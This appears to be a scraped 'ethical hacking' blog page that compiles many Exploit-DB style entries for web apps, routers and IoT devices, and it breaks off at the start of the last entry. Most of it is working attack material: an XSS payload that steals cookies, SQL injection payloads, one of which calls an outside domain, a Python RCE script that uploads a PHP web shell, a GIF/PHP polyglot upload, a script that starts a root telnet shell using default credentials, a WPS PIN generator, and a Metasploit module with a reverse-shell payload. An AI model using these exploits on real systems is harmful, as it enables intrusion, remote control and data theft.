# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
# Google Dork: "Powered By Best Support System"
# Date: 2020-08-23
# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
# Vendor: Appsbd [ https://appsbd.com ]
# Software Version: 3.0.4
# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
# Tested on: Kali Linux
# CVE: CVE-2020-24963
# CWE: CWE-79
[i] :: Info:
An Authenticated Persistent XSS vulnerability was discovered in the
Best Support System, tested version — v3.0.4.
[$] :: Payloads:
13"-->">'` -- `<!--<img src="--><img src=x
onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>
[!] :: PoC (Burp Suite POST request):
POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://localhost
Connection: close
Referer: https://localhost/support-system/ticket/details/11.html
Cookie: [cookies_here]
app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863119865
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
## Title: Best Student Result Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The nid parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'
was submitted in the nid parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
The attacker can get all information from the system by using this
vulnerability!
STATUS: HIGH- Vulnerability
[+]Payload:
```mysql
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM
(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT
NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
---
```
# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Google Dork: NA
# Date: 15/5/2023
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Kali Linux
import sys
import requests
import subprocess
import time
if len(sys.argv) < 2:
print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
print("Example: %s 192.168.106.130" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
def brute_force_timestamp(timestamp_prev, ip):
progress = 0
webshell = None
for i in range(20):
for j in range(0, 1000, 20):
timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
response = requests.get(url)
if response.status_code == 200:
webshell = url
break
progress += 1
print(f"Attempt {progress}/400", end="\r")
time.sleep(0.1)
if progress >= 400:
break
if webshell or progress >= 400:
break
if webshell:
print("\033[92m[+] Webshell found:", webshell, "\033[0m")
else:
print("\033[91m[-] Webshell not found\033[0m")
return webshell
def get_unix_timestamp():
timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
return int(timestamp)
def extract_output(response_text):
start_tag = "<pre>"
end_tag = "</pre>"
start_index = response_text.find(start_tag)
end_index = response_text.find(end_tag)
if start_index != -1 and end_index != -1 and start_index < end_index:
output = response_text[start_index + len(start_tag):end_index]
return output.strip()
return None
def code_execution(webshell):
if not webshell:
print("\033[91mWebshell URI not provided\033[0m")
return
while True:
command = input("Enter command to execute (or 'exit' to quit): ")
if command == 'exit':
break
url = webshell + f"?cmd={command}"
response = requests.get(url)
output = extract_output(response.text)
if output:
print("\033[93m[+] Output:\033[0m")
print(output)
else:
print("\033[91m[-] No output received\033[0m")
data = '''\
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="name"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="email"
test@gmail.com
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="contact"
9000000000
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="about"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
-----------------------------49858899034227071432271107689--'''
headers = {
'Host': f"{ip}",
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
'Content-Length': str(len(data)),
'Connection': 'close'
}
timestamp_prev = get_unix_timestamp()
response = requests.post(url, data=data, headers=headers)
if response.status_code == 200 and response.text == '1':
print("[+] Timestamp: %s" % timestamp_prev)
print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
webshell = brute_force_timestamp(timestamp_prev, ip)
code_execution(webshell)
else:
print("Did not worked")
# Exploit Title: Best pos Management System v1.0 - SQL Injection
# Google Dork: NA
# Date: 14/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA
```
GET /kruxton/billing/index.php?id=9 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/kruxton/index.php?page=orders
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```
# Payload
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 4017=4017
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=9 OR (SELECT 7313 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-9498 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL-- -
---
[19:33:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
```
# Exploit Title: Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : (CVE-2023-0943)
### Steps to Reproduce
1- Login as Admin Rule
2- Head to " http://localhost/kruxton/index.php?page=site_settings"
3- Try to Upload an image here it will be a shell.php
```
shell.php
``````
<?php system($_GET['cmd']); ?>
4- Head to http://localhost/kruxton/assets/uploads/
5- Access your uploaded Shell
http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami
source: https://www.securityfocus.com/bid/48969/info
BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script>
Berta CMS is a web based content management system using PHP and local file storage.
http://www.berta.me/
Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software.
We found that the file upload didn't require authentication.
Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.
It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>
We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.
The author was notified: 2015-03-22
Author Acknowledge: 2015-03-23
Patch released: 2015-03-26
The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files.
This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).
The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.
POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
Content-Length: 1617
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php
GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64
ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹
Ps c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðöa[q¥Î•P—Ë]Yy o™„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$
¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v
3jy'ž„šÉç£/øY …B
h¤œ^ž f<‹’FP‹(n %¤¤² )›q
*{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦kÒ¥`ž‚
k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/*
`ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v« £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’køá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°<
éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ;
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"
Upload Image
-----------------------------2147563051636691175750543802--
Simon Waters
# Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection
# Google Dork: N/A
# Date: 2020-10-11
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.berlicrm.de
# Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip
# Version: 1.0.24
# Tested on: Kali Linux
# CVE : N/A
========== Post Request =========================
POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: localhost
Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 226
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
__vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup
============= Vulnerable Parameter ===============
src_record (POST)
============= Payload ===========================
0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
# Exploit Title: Bematech Printer MP-4200 - Denial of Service
# Date: 2019-11-11
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.bematech.com.br/
# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
# Version: MP-4200 TH
# Tested on: Windows and Linux
# CVE : N/A
DoS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://TARGET/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
--------------------------------------------------------------------------------------------------------
XSS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://printer.com/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit
'''
Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities
Reported By:
==================================
James McLean -
Primary: james dot mclean at gmail dot com
Secondary: labs at juicedigital dot net
Device Overview:
==================================
From http://www.supercook.me/en/supercook/articles/btmkm800x/
"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional
kitchen machine. It has 13 functions so not only saves a huge amount of
time, it also incorporates the Yumi control module and its own recipe
collection, making it incredibly easy to use."
Vulnerability Overview:
==================================
Vuln1) Weak Username/Password for 'root' account.
Vuln2) Information disclosure, unauthenticated.
Vuln3) Remote arbitrary code execution.
CVE ID's
==================================
None assigned as yet.
Disclosure Timeline
==================================
2016-06-01: Vulnerability assessment commenced.
2016-07-04: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook Australia via Facebook. Supercook responded, saying they will view the support request. No further response recieved.
2016-07-19: Contacted Supercook Australia via Facebook. No response.
2016-07-21: Posted security assessment to vortex.id.au.
2016-07-22: Mitre contacted, CVE ID's requested.
It is with regret, but ultimately due to my concern for the community
that own these devices, that due to lack of communication I am disclosing
these vulnerabilities without the involvment of the vendor. I sincerely hope
that the vendor can resolve these issues in a timely manner.
I intend no malice by releasing these vulnerabilities, and only wish to
inform the community so appropriate steps may be taken by the owners of
these devices.
Due to the nature of the firmware on the device, these issues are not likely
caused by the vendor themselves.
Please do not use the information presented here for evil.
Affected Platforms:
==================================
Bellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3.
Bellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as
same firmware is used.
As the Wi-fi Yumi firmware appears to be based on a stock firmware image
used on a number of other commodity 'IoT' devices, the vulnerabilities
described here are very likely to affect other devices with similar or
the same firmware.
--
Vuln1 Details:
==================================
Weak Username/Password for Root-level account.
Username: super
Password: super
These credentials provide access to the built in FTP server and web
administration interface. We did not attempt any more than a cursory
connection to the FTP server with these details.
According to the details disclosed in Vuln2, an additional account is present
on the device with the following credentials:
Username: admin
Password: AlpheusDigital1010
With the exception of a cursory check of the built in FTP service (which
failed for these credentials), we did not attempt to access the device with
these credentials.
Vuln1 Notes:
==================================
We did not attempt to change or ascertain if it was possible to change these
access credentials; as Vuln2 completely negates any change made.
Vuln1 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
--
Vuln2 Details:
==================================
Information disclosure, unauthenticated.
Device URL: http://10.10.1.1/Setting.chipsipcmd
The device offers, via its built in webserver, a full list of all configuration
parameters available. This list includes the above mentioned root account
username and password, and the password to the parent connected wifi network.
All details are in plain text, and transmitted in the format of a key-value
pair making retrieval, recovery and use of all configuration
information trivial.
This interface is also available from the parent wi-fi network via DHCP assigned
IPv4 address.
Vuln2 Notes:
==================================
Example data returned:
DEF_IP_ADDR=10.10.1.1
DEF_SUBNET_MASK=255.255.255.0
...
DEF_SUPER_NAME="super"
DEF_SUPER_PASSWORD="super"
DEF_USER_NAME="admin"
DEF_USER_PASSWORD="AlpheusDigital1010"
...
Vuln2 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network, only using
the mobile application to upload recipes, then disconnect from the device and
connect your mobile device to a trusted network once again to access the
internet once again.
Revert to the non-wifi Yumi controller.
The vendor should establish a method of authentication to the device from the
various mobile applications available, and transport any configuration in an
encrypted format using keys which are not generally available or easily
discoverable.
--
Vuln3 Details:
==================================
Remote arbitrary code execution.
Device URL: http://10.10.1.1/syscmd.asp
The device offers a built-in web-shell which, once authenticated using the
details discovered in Vuln2, allows the execution of any command the device
can execute - as the built in webserver runs as the root user.
It is possible to execute a command using this interface that would create
any file in any location. This would allow an attacker to establish persistence.
Additionally, the built in busybox binary includes the option
'telnetd', meaning it is
possible to execute the relevant command to start a telnet daemon remotely.
The running daemon then requires no authentication to connect, and runs as
the root account.
Vuln3 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
Remove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please
mind your warranty if you modify the files on the device).
The vendor should disable any and all commands on the device and scripts in
the web interface which are not specifically required for the normal
functionality of the device or its communication with control apps.
In this instance, the vendor should REMOVE the page '/syscmd.asp' and also
/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent
arbitrary commands from being executed.
Additionally, busybox should be recompiled such that the 'telnetd' option is
no longer available to be executed.
--
Vuln1/Vuln2/Vuln3 Risks:
==================================
Weak and easily discoverable root credentials combined with easily accessed
remote shell functionality is a dangerous combination. These vulnerabilities
could allow any sufficiently advanced malware to become persistent in a LAN
and re-infect hosts at will (advanced crypto-locker style malware comes to
mind), capture and exfiltrate data on either Wireless network the device is
connected to, MITM any traffic routed through the device, or other as yet
unknown attack vectors.
Additionally, as full root access is easily obtainable, it may be possible
for an attacker to cause the cooking functionality to behave erratically or
possibly even dangerously due to the built in spinning blades and heating
elements. While we ultimately did not attempt to control these aspects of the
device due to the fact that it makes our dinner most nights, these risks are
worth raising.
This vulnerability assessment should not be considered an exhaustive list
of all vunlnerabilities the device may have. Due to time constraints we were
unable to invest the required time to discover and document all issues. Due to
the nature of the firmware on the device, most of these have likely been
discovered in other products at various times, this item may even duplicate
another from a similar device.
Notes:
==================================
No security assessment of code used for control of cooker functionality was
undertaken; as this does not, in my opinion, rate as seriously as the other
vulnerabilities discovered and disclosed here. However, it should be noted,
that with the root access that is VERY easily obtained, it may be possible for
an attacker to cause the cooking functionality of the machine to behave
erratically or even dangerously due to the built in spinning blades and heating
elements. Further to this, a malicious partner or offspring may intentionally
sabotage dinner, if he/she would prefer to eat takeout.
No attempt was made to connect to or manipulate files on the built in Samba
shares, however given the weak credentials sufficiently advanced malware may be
able to use these shares to establish persistence.
The 'Bellini' name may be regional, our device was procured in Australia and
as such may or may not have a different name in other countries.
A full, detailed, rundown and commentary is available at
https://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/
Vuln3 Proof of Concept:
==================================
'''
#!/usr/bin/env python
import urllib
import urllib2
from subprocess import call
# Connect to the device's wifi network, then run.
# Root access will be provided.
url = 'http://10.10.1.1/goform/formSysCmd'
cmd = 'busybox telnetd -l /bin/sh'
username = 'super'
password = 'super'
# setup the password handler
basicauth = urllib2.HTTPPasswordMgrWithDefaultRealm()
basicauth.add_password(None, url, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(basicauth)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
# Connect to the device, send the data
values = {
'sysCmd': cmd,
'apply': 'Apply',
'submit-url': '/syscmd.asp'
}
data = urllib.urlencode(values)
pagehandle = urllib2.urlopen(url, data)
# Connect to Telnet.
call(["telnet","10.10.1.1"])
# Pwnd.
# End of document.
source: https://www.securityfocus.com/bid/57128/info
Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN.
Successfully exploiting this issue may allow attackers to generate the default WPS PIN. This may lead to other attacks.
Belkin N900 F9K1104v1 is vulnerable; other versions may also be affected.
@author : e.novellalorente@student.ru.nl
Original work : ZhaoChunsheng 04/07/2012
'''
import sys
VERSION = 0
SUBVERSION = 2
def usage():
print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
print "[*] Usage : python WPSpin.py 123456"
sys.exit(0)
def wps_pin_checksum(pin):
accum = 0
while(pin):
accum += 3 * (pin % 10)
pin /= 10
accum += pin % 10
pin /= 10
return (10 - accum % 10) % 10
try:
if (len(sys.argv[1]) == 6):
p = int(sys.argv[1] , 16) % 10000000
print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
else:
usage()
except Exception:
usage()
V##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Belkin Wemo UPnP Remote Code Execution',
'Description' => %q{
This module exploits a command injection in the Belkin Wemo UPnP API via
the SmartDevURL argument to the SetSmartDevInfo action.
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different RPORT (49153).
},
'Author' => [
'phikshun', # Discovery, UFuzz, and modules
'wvu' # Crock-Pot testing and module
],
'References' => [
['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
['URL', 'https://github.com/phikshun/ufuzz'],
['URL', 'https://gist.github.com/phikshun/10900566'],
['URL', 'https://gist.github.com/phikshun/9984624'],
['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
['URL', 'http://www.wemo.com/']
],
'DisclosureDate' => '2014-04-04',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_MIPSLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic'
}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(49152)
])
register_advanced_options([
OptBool.new('ForceExploit', [true, 'Override check result', false]),
OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/setup.xml'
)
if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
vprint_good('Wemo-enabled device detected')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
checkcode = check
unless checkcode == CheckCode::Appears || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
cmdstager = generate_cmdstager(
flavor: 'wget',
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path),
noconcat: true
)
# HACK: "chmod +x"
cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
cmdstager = cmdstager.join(';')
vprint_status("Regenerated command stager: #{cmdstager}")
execute_command(cmdstager)
end
end
def execute_command(cmd, opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => '/upnp/control/basicevent1',
'ctype' => 'text/xml',
'headers' => {
'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
},
'data' => generate_soap_xml(cmd)
)
end
def generate_soap_xml(cmd)
<<EOF
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
<SmartDevURL>`#{cmd}`</SmartDevURL>
</u:SetSmartDevInfo>
</s:Body>
</s:Envelope>
EOF
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
end
end
# Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities
# Date: 16/01/2018
# Exploit Author: Wadeek
# Hardware Version: F9K1102as v3
# Firmware Version: 3.04.11
